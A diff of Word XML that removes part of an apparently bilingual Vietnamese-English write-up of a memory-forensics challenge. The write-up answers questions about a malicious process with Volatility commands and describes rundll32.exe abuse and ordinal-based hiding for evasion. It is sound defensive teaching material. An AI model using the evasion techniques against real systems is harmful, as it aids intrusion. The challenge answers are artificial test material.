-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Knowing the parent process ID (PPID) of the malicious process aids in tracing the process hierarchy and understanding the attack flow. What is the parent PID of the malicious process?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5300F327" wp14:editId="667D0392">
-            <wp:extent cx="5943600" cy="3154680"/>
-            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
-            <wp:docPr id="746630889" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48713EBF" wp14:editId="70F19DBE">
+            <wp:extent cx="5943600" cy="3091180"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1799751702" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -620,919 +3345,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="746630889" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3154680"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Top of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>K</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Bottom of Form</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">hi </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>hi đã biết được mã độc tên gì thì dễ dàng xác định được số PID của nó thông qua việc xem pstree</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="15"/>
-        </w:numPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>$ vol -f "192-Reveal.dmp" windows.pstree</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="283"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Q3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Determining the file name used by the malware for executing the second-stage payload is crucial for identifying subsequent malicious activities. What is the file name that the malware uses to execute the second-stage payload?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="17"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Để trích xuất xem </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>ta có thể dùng cmd để kiểm tra</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="15"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Vol -f “tên file” windows.cmd</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59695421" wp14:editId="383C85F7">
-            <wp:extent cx="5943600" cy="3107055"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1099865123" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1099865123" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3107055"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Top of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Bottom of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Q4</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Identifying the shared directory on the remote server helps trace the resources targeted by the attacker. What is the name of the shared directory being accessed on the remote server?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07401E9A" wp14:editId="41E29EA9">
-            <wp:extent cx="5943600" cy="3119120"/>
-            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
-            <wp:docPr id="1668800103" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1668800103" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3119120"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Top of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Bottom of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Q5</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>What is the MITRE ATT&amp;CK sub-technique ID that describes the execution of a second-stage payload using a Windows utility to run the malicious file?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2534E461" wp14:editId="7B4CBE6C">
-            <wp:extent cx="5943600" cy="2878455"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1850253623" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1850253623" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2878455"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="15"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Bản chất và mục đích:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Kẻ tấn công lạm dụng tiện ích hợp lệ rundll32.exe để chạy mã độc nhằm qua mặt các giải pháp bảo mật và đánh lừa hệ thống giám sát. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="15"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Các hình thức tấn công:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Kẻ gian có thể gọi trực tiếp hàm độc hại trong file DLL, kích hoạt file Control Panel (.cpl), thực thi script/JavaScript, hoặc lợi dụng các file DLL hợp pháp đã được ký số của Windows. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="15"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Kỹ thuật che giấu:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Kẻ tấn công lợi dụng cơ chế tương thích ký tự (Wide/Unicode trước ANSI) hoặc dùng số thứ tự (ordinal number) để che giấu mã độc và đánh lừa nhà phân tích.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Top of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Q6</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Identifying the username under which the malicious process runs helps in assessing the compromised account and its potential impact. What is the username that the malicious</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>process runs under?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="19"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Việc xác định tên người dùng mà tiến trình độc hại sử dụng giúp đánh giá tài khoản bị xâm nhập và tác động tiềm tàng của nó.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F72DBAE" wp14:editId="44E37955">
-            <wp:extent cx="5943600" cy="3141980"/>
-            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
-            <wp:docPr id="1758307633" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
